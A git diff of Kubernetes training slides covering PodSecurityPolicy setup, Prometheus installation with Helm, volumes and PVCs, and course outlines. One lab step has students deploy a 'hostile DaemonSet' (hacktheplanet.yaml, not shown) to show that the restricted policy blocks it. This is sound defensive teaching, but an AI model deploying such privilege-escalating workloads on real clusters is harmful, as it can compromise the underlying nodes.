- To enable Pod Security Policies, we need to enable their *admission plugin*
|
||||
|
||||
- This is done by adding a flag to the API server
|
||||
|
||||
- On clusters deployed with `kubeadm`, the control plane runs in static pods
|
||||
|
||||
- These pods are defined in YAML files located in `/etc/kubernetes/manifests`
|
||||
|
||||
- Kubelet watches this directory
|
||||
|
||||
- Each time a file is added/removed there, kubelet creates/deletes the corresponding pod
|
||||
|
||||
- Updating a file causes the pod to be deleted and recreated
|
||||
|
||||
---
|
||||
|
||||
## Updating the API server flags
|
||||
|
||||
- Let's edit the manifest for the API server pod
|
||||
|
||||
.exercise[
|
||||
|
||||
- Have a look at the static pods:
|
||||
```bash
|
||||
ls -l /etc/kubernetes/manifest
|
||||
```
|
||||
|
||||
- Edit the one corresponding to the API server:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adding the PSP admission plugin
|
||||
|
||||
- There should already be a line with `--enable-admission-plugins=...`
|
||||
|
||||
- Let's add `PodSecurityPolicy` on that line
|
||||
|
||||
.exercise[
|
||||
|
||||
- Locate the line with `--enable-admission-plugins=`
|
||||
|
||||
- Add `PodSecurityPolicy`
|
||||
|
||||
(It should read `--enable-admission-plugins=NodeRestriction,PodSecurityPolicy`)
|
||||
|
||||
- Save, quit
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Waiting for the API server to restart
|
||||
|
||||
- The kubelet detects that the file was modified
|
||||
|
||||
- It kills the API server pod, and starts a new one
|
||||
|
||||
- During that time, the API server is unavailable
|
||||
|
||||
.exercise[
|
||||
|
||||
- Wait until the API server is available again
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Check that the admission plugin is active
|
||||
|
||||
- Normally, we can't create any Pod at this point
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to create a Pod directly:
|
||||
```bash
|
||||
kubectl run testpsp1 --image=nginx --restart=Never
|
||||
```
|
||||
|
||||
- Try to create a Deployment:
|
||||
```bash
|
||||
kubectl run testpsp2 --image=nginx
|
||||
```
|
||||
|
||||
- Look at existing resources:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We can get hints at what's happening by looking at the ReplicaSet and Events.
|
||||
|
||||
---
|
||||
|
||||
## Introducing our Pod Security Policies
|
||||
|
||||
- We will create two policies:
|
||||
|
||||
- privileged (allows everything)
|
||||
|
||||
- restricted (blocks some unsafe mechanisms)
|
||||
|
||||
- For each policy, we also need an associated ClusterRole granting *use*
|
||||
|
||||
---
|
||||
|
||||
## Creating our Pod Security Policies
|
||||
|
||||
- We have a couple of files, each defining a PSP and associated ClusterRole:
|
||||
|
||||
- k8s/psp-privileged.yaml: policy `privileged`, role `psp:privileged`
|
||||
- k8s/psp-restricted.yaml: policy `restricted`, role `psp:restricted`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create both policies and their associated ClusterRoles:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/psp-restricted.yaml
|
||||
kubectl create -f ~/container.training/k8s/psp-privileged.yaml
|
||||
```
|
||||
]
|
||||
|
||||
- The privileged policy comes from [the Kubernetes documentation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#example-policies)
|
||||
|
||||
- The restricted policy is inspired by that same documentation page
|
||||
|
||||
---
|
||||
|
||||
## Binding the restricted policy
|
||||
|
||||
- Let's bind the role `psp:restricted` to ServiceAccount `green:default`
|
||||
|
||||
(aka the default ServiceAccount in the green Namespace)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the following RoleBinding:
|
||||
```bash
|
||||
kubectl create rolebinding psp:restricted \
|
||||
--clusterrole=psp:restricted \
|
||||
--serviceaccount=green:default
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- Let's switch to the `green` context, and try to create resources
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch to the `green` context:
|
||||
```bash
|
||||
kctx green
|
||||
```
|
||||
|
||||
- Create a simple Deployment:
|
||||
```bash
|
||||
kubectl create deployment web --image=nginx
|
||||
```
|
||||
|
||||
- Look at the Pods that have been created:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Trying to hack the cluster
|
||||
|
||||
- Let's create the same DaemonSet we used earlier
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a hostile DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Look at the state of the namespace:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## What's in our restricted policy?
|
||||
|
||||
- The restricted PSP is similar to the one provided in the docs, but:
|
||||
|
||||
- it allows containers to run as root
|
||||
|
||||
- it doesn't drop capabilities
|
||||
|
||||
- Many containers run as root by default, and would require additional tweaks
|
||||
|
||||
- Many containers use e.g. `chown`, which requires a specific capability
|
||||
|
||||
(that's the case for the NGINX official image, for instance)
|
||||
|
||||
- We still block: hostPath, privileged containers, and much more!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The case of static pods
|
||||
|
||||
- If we list the pods in the `kube-system` namespace, `kube-apiserver` is missing
|
||||
|
||||
- However, the API server is obviously running
|
||||
|
||||
(otherwise, `kubectl get pods --namespace=kube-system` wouldn't work)
|
||||
|
||||
- The API server Pod is created directly by kubelet
|
||||
|
||||
(without going through the PSP admission plugin)
|
||||
|
||||
- Then, kubelet creates a "mirror pod" representing that Pod in etcd
|
||||
|
||||
- That "mirror pod" creation goes through the PSP admission plugin
|
||||
|
||||
- And it gets blocked!
|
||||
|
||||
- This can be fixed by binding `psp:privileged` to group `system:nodes`
|
||||
|
||||
---
|
||||
|
||||
## .warning[Before moving on...]
|
||||
|
||||
- Our cluster is currently broken
|
||||
|
||||
(we can't create pods in kube-system, default, ...)
|
||||
|
||||
- We need to either:
|
||||
|
||||
- disable the PSP admission plugin
|
||||
|
||||
- allow use of PSP to relevant users and groups
|
||||
|
||||
- For instance, we could:
|
||||
|
||||
- bind `psp:restricted` to the group `system:authenticated`
|
||||
|
||||
- bind `psp:privileged` to the ServiceAccount `kube-system:default`
|
||||
@@ -12,7 +12,7 @@
|
||||
|
||||
- an *alert manager* to notify us according to metrics values or trends
|
||||
|
||||
- We are going to deploy it on our Kubernetes cluster and see how to query it
|
||||
- We are going to use it to collect and query some metrics on our Kubernetes cluster
|
||||
|
||||
---
|
||||
|
||||
@@ -145,7 +145,28 @@ scrape_configs:
|
||||
|
||||
(it will even be gentler on the I/O subsystem since it needs to write less)
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
- Would you like to know more? Check this video:
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
|
||||
---
|
||||
|
||||
## Checking if Prometheus is installed
|
||||
|
||||
- Before trying to install Prometheus, let's check if it's already there
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look for services with a label `app=prometheus` across all namespaces:
|
||||
```bash
|
||||
kubectl get services --selector=app=prometheus --all-namespaces
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
If we see a `NodePort` service called `prometheus-server`, we're good!
|
||||
|
||||
(We can then skip to "Connecting to the Prometheus web UI".)
|
||||
|
||||
---
|
||||
|
||||
@@ -169,11 +190,11 @@ We need to:
|
||||
|
||||
---
|
||||
|
||||
## Helm Charts to the rescue
|
||||
## Helm charts to the rescue
|
||||
|
||||
- To make our lives easier, we are going to use a Helm Chart
|
||||
- To make our lives easier, we are going to use a Helm chart
|
||||
|
||||
- The Helm Chart will take care of all the steps explained above
|
||||
- The Helm chart will take care of all the steps explained above
|
||||
|
||||
(including some extra features that we don't need, but won't hurt)
|
||||
|
||||
@@ -210,20 +231,41 @@ We need to:
|
||||
|
||||
- Install Prometheus on our cluster:
|
||||
```bash
|
||||
helm install stable/prometheus \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.persistentVolume.enabled=false
|
||||
helm upgrade prometheus stable/prometheus \
|
||||
--install \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
--set server.persistentVolume.enabled=false \
|
||||
--set alertmanager.enabled=false
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The provided flags:
|
||||
Curious about all these flags? They're explained in the next slide.
|
||||
|
||||
- expose the server web UI (and API) on a NodePort
|
||||
---
|
||||
|
||||
- use an ephemeral volume for metrics storage
|
||||
<br/>
|
||||
(instead of requesting a Persistent Volume through a Persistent Volume Claim)
|
||||
class: extra-details
|
||||
|
||||
## Explaining all the Helm flags
|
||||
|
||||
- `helm upgrade prometheus` → upgrade release "prometheus" to the latest version ...
|
||||
|
||||
(a "release" is a unique name given to an app deployed with Helm)
|
||||
|
||||
- `stable/prometheus` → ... of the chart `prometheus` in repo `stable`
|
||||
|
||||
- `--install` → if the app doesn't exist, create it
|
||||
|
||||
- `--namespace kube-system` → put it in that specific namespace
|
||||
|
||||
- And set the following *values* when rendering the chart's templates:
|
||||
|
||||
- `server.service.type=NodePort` → expose the Prometheus server with a NodePort
|
||||
- `server.service.nodePort=30090` → set the specific NodePort number to use
|
||||
- `server.persistentVolume.enabled=false` → do not use a PersistentVolumeClaim
|
||||
- `alertmanager.enabled=false` → disable the alert manager entirely
|
||||
|
||||
---
|
||||
|
||||
@@ -235,7 +277,7 @@ The provided flags:
|
||||
|
||||
- Figure out the NodePort that was allocated to the Prometheus server:
|
||||
```bash
|
||||
kubectl get svc | grep prometheus-server
|
||||
kubectl get svc --all-namespaces | grep prometheus-server
|
||||
```
|
||||
|
||||
- With your browser, connect to that port
|
||||
@@ -292,7 +334,7 @@ This query will show us CPU usage across all containers:
|
||||
container_cpu_usage_seconds_total
|
||||
```
|
||||
|
||||
- The suffix of the metrics name tells us:
|
||||
- The suffix of the metrics name tells us:
|
||||
|
||||
- the unit (seconds of CPU)
|
||||
|
||||
@@ -486,3 +528,21 @@ class: extra-details
|
||||
- see [this comment](https://github.com/prometheus/prometheus/issues/2204#issuecomment-261515520) for an overview
|
||||
|
||||
- or [this blog post](https://5pi.de/2017/11/09/use-prometheus-vector-matching-to-get-kubernetes-utilization-across-any-pod-label/) for a complete description of the process
|
||||
|
||||
---
|
||||
|
||||
## In practice
|
||||
|
||||
- Grafana is a beautiful (and useful) frontend to display all kinds of graphs
|
||||
|
||||
- Not everyone needs to know Prometheus, PromQL, Grafana, etc.
|
||||
|
||||
- But in a team, it is valuable to have at least one person who know them
|
||||
|
||||
- That person can set up queries and dashboards for the rest of the team
|
||||
|
||||
- It's a little bit likeknowing how to optimize SQL queries, Dockerfiles ...
|
||||
|
||||
Don't panic if you don't know these tools!
|
||||
|
||||
... But make sure at least one person in your team is on it 💯
|
||||
|
||||
@@ -49,7 +49,6 @@
|
||||
|
||||
---
|
||||
|
||||
|
||||
## Rolling updates in practice
|
||||
|
||||
- As of Kubernetes 1.8, we can do rolling updates with:
|
||||
@@ -64,12 +63,15 @@
|
||||
|
||||
## Building a new version of the `worker` service
|
||||
|
||||
.warning[
|
||||
Only run these commands if you have built and pushed DockerCoins to a local registry.
|
||||
<br/>
|
||||
If you are using images from the Docker Hub (`dockercoins/worker:v0.1`), skip this.
|
||||
]
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `stack` directory:
|
||||
```bash
|
||||
cd ~/container.training/stacks
|
||||
```
|
||||
- Go to the `stacks` directory (`~/container.training/stacks`)
|
||||
|
||||
- Edit `dockercoins/worker/worker.py`; update the first `sleep` line to sleep 1 second
|
||||
|
||||
|
||||
@@ -34,13 +34,13 @@
|
||||
|
||||
- Each pod can discover the IP address of the others easily
|
||||
|
||||
- The pods can have persistent volumes attached to them
|
||||
- The pods can persist data on attached volumes
|
||||
|
||||
🤔 Wait a minute ... Can't we already attach volumes to pods and deployments?
|
||||
|
||||
---
|
||||
|
||||
## Volumes and Persistent Volumes
|
||||
## Revisiting volumes
|
||||
|
||||
- [Volumes](https://kubernetes.io/docs/concepts/storage/volumes/) are used for many purposes:
|
||||
|
||||
@@ -50,13 +50,13 @@
|
||||
|
||||
- accessing storage systems
|
||||
|
||||
- The last type of volumes is known as a "Persistent Volume"
|
||||
- Let's see examples of the latter usage
|
||||
|
||||
---
|
||||
|
||||
## Persistent Volumes types
|
||||
## Volumes types
|
||||
|
||||
- There are many [types of Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/#types-of-persistent-volumes) available:
|
||||
- There are many [types of volumes](https://kubernetes.io/docs/concepts/storage/volumes/#types-of-volumes) available:
|
||||
|
||||
- public cloud storage (GCEPersistentDisk, AWSElasticBlockStore, AzureDisk...)
|
||||
|
||||
@@ -74,7 +74,7 @@
|
||||
|
||||
---
|
||||
|
||||
## Using a Persistent Volume
|
||||
## Using a cloud volume
|
||||
|
||||
Here is a pod definition using an AWS EBS volume (that has to be created first):
|
||||
|
||||
@@ -99,7 +99,32 @@ spec:
|
||||
|
||||
---
|
||||
|
||||
## Shortcomings of Persistent Volumes
|
||||
## Using an NFS volume
|
||||
|
||||
Here is another example using a volume on an NFS server:
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: pod-using-my-nfs-volume
|
||||
spec:
|
||||
containers:
|
||||
- image: ...
|
||||
name: container-using-my-nfs-volume
|
||||
volumeMounts:
|
||||
- mountPath: /my-nfs
|
||||
name: my-nfs-volume
|
||||
volumes:
|
||||
- name: my-nfs-volume
|
||||
nfs:
|
||||
server: 192.168.0.55
|
||||
path: "/exports/assets"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Shortcomings of volumes
|
||||
|
||||
- Their lifecycle (creation, deletion...) is managed outside of the Kubernetes API
|
||||
|
||||
@@ -125,17 +150,47 @@ spec:
|
||||
|
||||
- This type is a *Persistent Volume Claim*
|
||||
|
||||
- A Persistent Volume Claim (PVC) is a resource type
|
||||
|
||||
(visible with `kubectl get persistentvolumeclaims` or `kubectl get pvc`)
|
||||
|
||||
- A PVC is not a volume; it is a *request for a volume*
|
||||
|
||||
---
|
||||
|
||||
## Persistent Volume Claims in practice
|
||||
|
||||
- Using a Persistent Volume Claim is a two-step process:
|
||||
|
||||
- creating the claim
|
||||
|
||||
- using the claim in a pod (as if it were any other kind of volume)
|
||||
|
||||
- Between these two steps, something will happen behind the scenes:
|
||||
- A PVC starts by being Unbound (without an associated volume)
|
||||
|
||||
- Kubernetes will associate an existing volume with the claim
|
||||
- Once it is associated with a Persistent Volume, it becomes Bound
|
||||
|
||||
- ... or dynamically create a volume if possible and necessary
|
||||
- A Pod referring an unbound PVC will not start
|
||||
|
||||
(but as soon as the PVC is bound, the Pod can start)
|
||||
|
||||
---
|
||||
|
||||
## Binding PV and PVC
|
||||
|
||||
- A Kubernetes controller continuously watches PV and PVC objects
|
||||
|
||||
- When it notices an unbound PVC, it tries to find a satisfactory PV
|
||||
|
||||
("satisfactory" in terms of size and other characteristics; see next slide)
|
||||
|
||||
- If no PV fits the PVC, a PV can be created dynamically
|
||||
|
||||
(this requires to configure a *dynamic provisioner*, more on that later)
|
||||
|
||||
- Otherwise, the PVC remains unbound indefinitely
|
||||
|
||||
(until we manually create a PV or setup dynamic provisioning)
|
||||
|
||||
---
|
||||
|
||||
@@ -147,7 +202,9 @@ spec:
|
||||
|
||||
- the access mode (e.g. "read-write by a single pod")
|
||||
|
||||
- It can also give extra details, like:
|
||||
- Optionally, it can also specify a Storage Class
|
||||
|
||||
- The Storage Class indicates:
|
||||
|
||||
- which storage system to use (e.g. Portworx, EBS...)
|
||||
|
||||
@@ -155,8 +212,6 @@ spec:
|
||||
|
||||
e.g.: "replicate the data 3 times, and use SSD media"
|
||||
|
||||
- The extra details are provided by specifying a Storage Class
|
||||
|
||||
---
|
||||
|
||||
## What's a Storage Class?
|
||||
@@ -167,15 +222,15 @@ spec:
|
||||
|
||||
- It indicates which *provisioner* to use
|
||||
|
||||
(which controller will create the actual volume)
|
||||
|
||||
- And arbitrary parameters for that provisioner
|
||||
|
||||
(replication levels, type of disk ... anything relevant!)
|
||||
|
||||
- It is necessary to define a Storage Class to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
|
||||
- Storage Classes are required if we want to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
|
||||
|
||||
- Conversely, it is not necessary to define one if you will create volumes manually
|
||||
|
||||
(we will see dynamic provisioning in action later)
|
||||
(but we can also create volumes manually, and ignore Storage Classes)
|
||||
|
||||
---
|
||||
|
||||
@@ -200,7 +255,7 @@ spec:
|
||||
|
||||
## Using a Persistent Volume Claim
|
||||
|
||||
Here is the same definition as earlier, but using a PVC:
|
||||
Here is a Pod definition like the ones shown earlier, but using a PVC:
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
@@ -212,7 +267,7 @@ spec:
|
||||
- image: ...
|
||||
name: container-using-a-claim
|
||||
volumeMounts:
|
||||
- mountPath: /my-ebs
|
||||
- mountPath: /my-vol
|
||||
name: my-volume
|
||||
volumes:
|
||||
- name: my-volume
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
## Versions installed
|
||||
|
||||
- Kubernetes 1.14.1
|
||||
- Docker Engine 18.09.5
|
||||
- Kubernetes 1.14.2
|
||||
- Docker Engine 18.09.6
|
||||
- Docker Compose 1.21.1
|
||||
|
||||
<!-- ##VERSION## -->
|
||||
|
||||
@@ -18,6 +18,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Kubernetes volumes vs. Docker volumes
|
||||
|
||||
- Kubernetes and Docker volumes are very similar
|
||||
@@ -35,13 +37,35 @@
|
||||
- Kubernetes volumes are also used to expose configuration and secrets
|
||||
|
||||
- Docker has specific concepts for configuration and secrets
|
||||
|
||||
<br/>
|
||||
(but under the hood, the technical implementation is similar)
|
||||
|
||||
- If you're not familiar with Docker volumes, you can safely ignore this slide!
|
||||
|
||||
---
|
||||
|
||||
## Volumes ≠ Persistent Volumes
|
||||
|
||||
- Volumes and Persistent Volumes are related, but very different!
|
||||
|
||||
- *Volumes*:
|
||||
|
||||
- appear in Pod specifications (see next slide)
|
||||
|
||||
- do not exist as API resources (**cannot** do `kubectl get volumes`)
|
||||
|
||||
- *Persistent Volumes*:
|
||||
|
||||
- are API resources (**can** do `kubectl get persistentvolumes`)
|
||||
|
||||
- correspond to concrete volumes (e.g. on a SAN, EBS, etc.)
|
||||
|
||||
- cannot be associated to a Pod directly; but through a Persistent Volume Claim
|
||||
|
||||
- won't be discussed further in this section
|
||||
|
||||
---
|
||||
|
||||
## A simple volume example
|
||||
|
||||
```yaml
|
||||
|
||||
@@ -132,6 +132,8 @@ And *then* it is time to look at orchestration!
|
||||
|
|
||||
[Persistent Volumes](kube-selfpaced.yml.html#toc-highly-available-persistent-volumes)
|
||||
|
||||
- Excellent [blog post](http://www.databasesoup.com/2018/07/should-i-run-postgres-on-kubernetes.html) tackling the question: “Should I run Postgres on Kubernetes?”
|
||||
|
||||
---
|
||||
|
||||
## HTTP traffic handling
|
||||
|
||||
@@ -1,43 +0,0 @@
|
||||
title: |
|
||||
Kubernetes
|
||||
for Admins and Ops
|
||||
|
||||
#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
chat: "[Gitter](https://gitter.im/enix/formation-kubernetes-ops-20190426)"
|
||||
#chat: "In person!"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: http://kadm-2019-04.container.training/
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
- static-pods-exercise
|
||||
|
||||
chapters:
|
||||
- shared/title.md
|
||||
- logistics.md
|
||||
- k8s/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - k8s/prereqs-admin.md
|
||||
- k8s/architecture.md
|
||||
- k8s/dmuc.md
|
||||
- - k8s/multinode.md
|
||||
- k8s/cni.md
|
||||
- k8s/apilb.md
|
||||
#FIXME: check le talk de Laurent Corbes pour voir s'il y a d'autres choses utiles à mentionner
|
||||
#BONUS: intégration CoreDNS pour résoudre les noms des clusters des voisins
|
||||
- - k8s/setup-managed.md
|
||||
- k8s/setup-selfhosted.md
|
||||
- k8s/cluster-upgrade.md
|
||||
- k8s/staticpods.md
|
||||
- k8s/cluster-backup.md
|
||||
- k8s/cloud-controller-manager.md
|
||||
- k8s/bootstrap.md
|
||||
- - k8s/resource-limits.md
|
||||
- k8s/metrics-server.md
|
||||
- k8s/cluster-sizing.md
|
||||
- - k8s/lastwords-admin.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
@@ -20,50 +20,58 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
# - shared/composescale.md
|
||||
# - shared/hastyconclusions.md
|
||||
#- shared/composescale.md
|
||||
#- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- k8s/concepts-k8s.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- - k8s/kubenet.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/kubenet.md
|
||||
- - k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- k8s/kubectlexpose.md
|
||||
- - k8s/shippingimages.md
|
||||
# - k8s/buildshiprun-selfhosted.md
|
||||
#- k8s/buildshiprun-selfhosted.md
|
||||
- k8s/buildshiprun-dockerhub.md
|
||||
- k8s/ourapponkube.md
|
||||
# - k8s/kubectlproxy.md
|
||||
# - k8s/localkubeconfig.md
|
||||
# - k8s/accessinternal.md
|
||||
#- k8s/kubectlproxy.md
|
||||
#- k8s/localkubeconfig.md
|
||||
#- k8s/accessinternal.md
|
||||
- k8s/dashboard.md
|
||||
# - k8s/kubectlscale.md
|
||||
#- k8s/kubectlscale.md
|
||||
- k8s/scalingdockercoins.md
|
||||
- shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- - k8s/rollout.md
|
||||
# - k8s/healthchecks.md
|
||||
- k8s/namespaces.md
|
||||
#- k8s/kustomize.md
|
||||
#- k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
#- k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
#- - k8s/helm.md
|
||||
# - k8s/namespaces.md
|
||||
# - k8s/netpol.md
|
||||
# - k8s/authn-authz.md
|
||||
#- - k8s/ingress.md
|
||||
# - k8s/gitworkflows.md
|
||||
#- k8s/netpol.md
|
||||
#- k8s/authn-authz.md
|
||||
#- k8s/csr-api.md
|
||||
#- k8s/podsecuritypolicy.md
|
||||
#- k8s/ingress.md
|
||||
#- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
#- - k8s/volumes.md
|
||||
# - k8s/build-with-docker.md
|
||||
# - k8s/build-with-kaniko.md
|
||||
# - k8s/configuration.md
|
||||
#- - k8s/owners-and-dependents.md
|
||||
# - k8s/extending-api.md
|
||||
# - k8s/statefulsets.md
|
||||
# - k8s/portworx.md
|
||||
#- k8s/volumes.md
|
||||
#- k8s/build-with-docker.md
|
||||
#- k8s/build-with-kaniko.md
|
||||
#- k8s/configuration.md
|
||||
#- k8s/owners-and-dependents.md
|
||||
#- k8s/extending-api.md
|
||||
#- k8s/statefulsets.md
|
||||
#- k8s/local-persistent-volumes.md
|
||||
#- k8s/portworx.md
|
||||
#- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
- k8s/links.md
|
||||
- shared/thankyou.md
|
||||
|
||||
@@ -1,62 +0,0 @@
|
||||
title: |
|
||||
Kubernetes 101
|
||||
|
||||
|
||||
#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
#chat: "[Gitter](https://gitter.im/jpetazzo/training-20180413-paris)"
|
||||
chat: "In person!"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: http://container.training/
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
|
||||
chapters:
|
||||
- shared/title.md
|
||||
#- logistics.md
|
||||
# Bridget-specific; others use logistics.md
|
||||
- logistics-bridget.md
|
||||
- k8s/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
# Bridget doesn't go into as much depth with compose
|
||||
#- shared/composescale.md
|
||||
#- shared/hastyconclusions.md
|
||||
- shared/composedown.md
|
||||
- k8s/concepts-k8s.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- k8s/kubenet.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- - k8s/kubectlrun.md
|
||||
- k8s/kubectlexpose.md
|
||||
- k8s/shippingimages.md
|
||||
#- k8s/buildshiprun-selfhosted.md
|
||||
- k8s/buildshiprun-dockerhub.md
|
||||
- k8s/ourapponkube.md
|
||||
#- k8s/kubectlproxy.md
|
||||
#- k8s/localkubeconfig.md
|
||||
#- k8s/accessinternal.md
|
||||
- - k8s/dashboard.md
|
||||
#- k8s/kubectlscale.md
|
||||
- k8s/scalingdockercoins.md
|
||||
- shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- k8s/rollout.md
|
||||
- - k8s/logs-cli.md
|
||||
# Bridget hasn't added EFK yet
|
||||
#- k8s/logs-centralized.md
|
||||
- k8s/helm.md
|
||||
- k8s/namespaces.md
|
||||
#- k8s/netpol.md
|
||||
- k8s/whatsnext.md
|
||||
# - k8s/links.md
|
||||
# Bridget-specific
|
||||
- k8s/links-bridget.md
|
||||
- shared/thankyou.md
|
||||
@@ -20,6 +20,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
- shared/composescale.md
|
||||
@@ -32,8 +33,9 @@ chapters:
|
||||
- k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/kubectlexpose.md
|
||||
- - k8s/shippingimages.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- - k8s/kubectlexpose.md
|
||||
- k8s/shippingimages.md
|
||||
- k8s/buildshiprun-selfhosted.md
|
||||
- k8s/buildshiprun-dockerhub.md
|
||||
- k8s/ourapponkube.md
|
||||
@@ -41,18 +43,22 @@ chapters:
|
||||
- k8s/localkubeconfig.md
|
||||
- k8s/accessinternal.md
|
||||
- k8s/dashboard.md
|
||||
- k8s/kubectlscale.md
|
||||
- - k8s/kubectlscale.md
|
||||
# - k8s/scalingdockercoins.md
|
||||
# - shared/hastyconclusions.md
|
||||
- k8s/daemonset.md
|
||||
- - k8s/rollout.md
|
||||
- k8s/rollout.md
|
||||
- k8s/namespaces.md
|
||||
- - k8s/kustomize.md
|
||||
- k8s/helm.md
|
||||
- k8s/create-chart.md
|
||||
- k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
- - k8s/helm.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/netpol.md
|
||||
- - k8s/netpol.md
|
||||
- k8s/authn-authz.md
|
||||
- k8s/csr-api.md
|
||||
- k8s/podsecuritypolicy.md
|
||||
- - k8s/ingress.md
|
||||
- k8s/gitworkflows.md
|
||||
- k8s/prometheus.md
|
||||
@@ -62,7 +68,8 @@ chapters:
|
||||
- k8s/configuration.md
|
||||
- - k8s/owners-and-dependents.md
|
||||
- k8s/extending-api.md
|
||||
- k8s/statefulsets.md
|
||||
- - k8s/statefulsets.md
|
||||
- k8s/local-persistent-volumes.md
|
||||
- k8s/portworx.md
|
||||
- k8s/staticpods.md
|
||||
- - k8s/whatsnext.md
|
||||
|
||||
@@ -20,6 +20,7 @@ chapters:
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - shared/prereqs.md
|
||||
- shared/connecting.md
|
||||
- k8s/versions-k8s.md
|
||||
- shared/sampleapp.md
|
||||
#- shared/composescale.md
|
||||
@@ -28,10 +29,11 @@ chapters:
|
||||
- k8s/concepts-k8s.md
|
||||
- shared/declarative.md
|
||||
- k8s/declarative.md
|
||||
- - k8s/kubenet.md
|
||||
- k8s/kubectlget.md
|
||||
- k8s/kubenet.md
|
||||
- - k8s/kubectlget.md
|
||||
- k8s/setup-k8s.md
|
||||
- k8s/kubectlrun.md
|
||||
- k8s/deploymentslideshow.md
|
||||
- k8s/kubectlexpose.md
|
||||
- - k8s/shippingimages.md
|
||||
#- k8s/buildshiprun-selfhosted.md
|
||||
@@ -46,13 +48,17 @@ chapters:
|
||||
- shared/hastyconclusions.md
|
||||
- - k8s/daemonset.md
|
||||
- k8s/rollout.md
|
||||
- k8s/healthchecks.md
|
||||
- k8s/namespaces.md
|
||||
- k8s/kustomize.md
|
||||
#- k8s/helm.md
|
||||
#- k8s/create-chart.md
|
||||
- - k8s/healthchecks.md
|
||||
- k8s/logs-cli.md
|
||||
- k8s/logs-centralized.md
|
||||
